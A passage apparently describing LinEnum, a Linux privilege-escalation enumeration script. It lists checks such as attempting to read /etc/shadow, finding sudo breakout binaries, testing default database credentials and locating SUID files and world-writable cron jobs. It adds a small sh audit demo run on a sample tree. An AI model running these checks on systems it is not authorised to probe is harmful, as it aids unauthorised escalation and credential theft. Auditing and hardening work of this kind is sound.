    • List root accounts
    • Extracts password policies and hash storage method information
    • Checks umask value
    • Checks if password hashes are stored in /etc/passwd
    • Extracts full details for 'default' uids such as 0, 1000, 1001 etc.
    • Attempts to read restricted files, e.g. /etc/shadow
    • Lists current user's history files (e.g. .bash_history, .nano_history etc.)
    • Basic SSH checks
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known 'good' breakout binaries available via Sudo (e.g. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xinetd.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
    • Checks user config
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default/weak MYSQL accounts
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate 'interesting' SUID/GUID files (e.g. nmap, vim etc.)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
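Three of the checks in the list above (the keyword search through *.conf and *.log files with path and line number, detecting password hashes stored in a passwd file, and finding world-writable cron files), re-implemented as a small POSIX sh audit. This is an added illustration, not LinEnum's own code; it runs against a constructed sample tree with made-up values so it is self-contained.

```shell
# Added example (not LinEnum's code): minimal POSIX sh versions of three checks
# from the list above, run against a constructed sample directory.

# Print "path:lineno:text" for every case-insensitive match of KEYWORD in
# *.conf and *.log files under DIR (the 'extra' keyword feature).
keyword_search() {
    dir=$1; kw=$2
    find "$dir" -type f \( -name '*.conf' -o -name '*.log' \) 2>/dev/null |
    while IFS= read -r f; do
        grep -n -i -- "$kw" "$f" 2>/dev/null | sed "s|^|$f:|"
    done
}

# Exit 0 if any entry in a passwd-format FILE carries a real hash in field 2
# instead of the usual "x"/"*"/"!" placeholder that points at /etc/shadow.
passwd_has_hashes() {
    awk -F: '$2 != "" && $2 != "x" && $2 != "*" && $2 != "!" { found=1 }
             END { exit (found ? 0 : 1) }' "$1"
}

# List files under DIR that are writable by "other" (mode o+w), as LinEnum does
# for cron directories: a world-writable cron job is an escalation point.
world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Constructed sample tree; every value below is made up for the demo.
SAMPLE=$(mktemp -d)
mkdir -p "$SAMPLE/etc/cron.d"
printf 'db_host=localhost\ndb_password=Example123\n' > "$SAMPLE/etc/app.conf"
printf 'INFO started\nWARN password prompt failed\n' > "$SAMPLE/app.log"
printf 'root:x:0:0:root:/root:/bin/sh\nsvc:$6$abc$hashhere:1001:1001::/home/svc:/bin/sh\n' \
    > "$SAMPLE/etc/passwd"
printf '* * * * * root /usr/local/bin/backup.sh\n' > "$SAMPLE/etc/cron.d/backup"
chmod 666 "$SAMPLE/etc/cron.d/backup"     # deliberately world-writable
printf '0 3 * * * root /usr/bin/rotate\n' > "$SAMPLE/etc/cron.d/rotate"
chmod 644 "$SAMPLE/etc/cron.d/rotate"

keyword_search "$SAMPLE" password
passwd_has_hashes "$SAMPLE/etc/passwd" && echo "finding: hashes stored in passwd file"
world_writable "$SAMPLE/etc/cron.d"
```

On a real host you would point `keyword_search` at `/etc` and `/var/log`, `passwd_has_hashes` at `/etc/passwd`, and `world_writable` at `/etc/cron*`.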
You can download LinEnum v0.5 here:
master.zip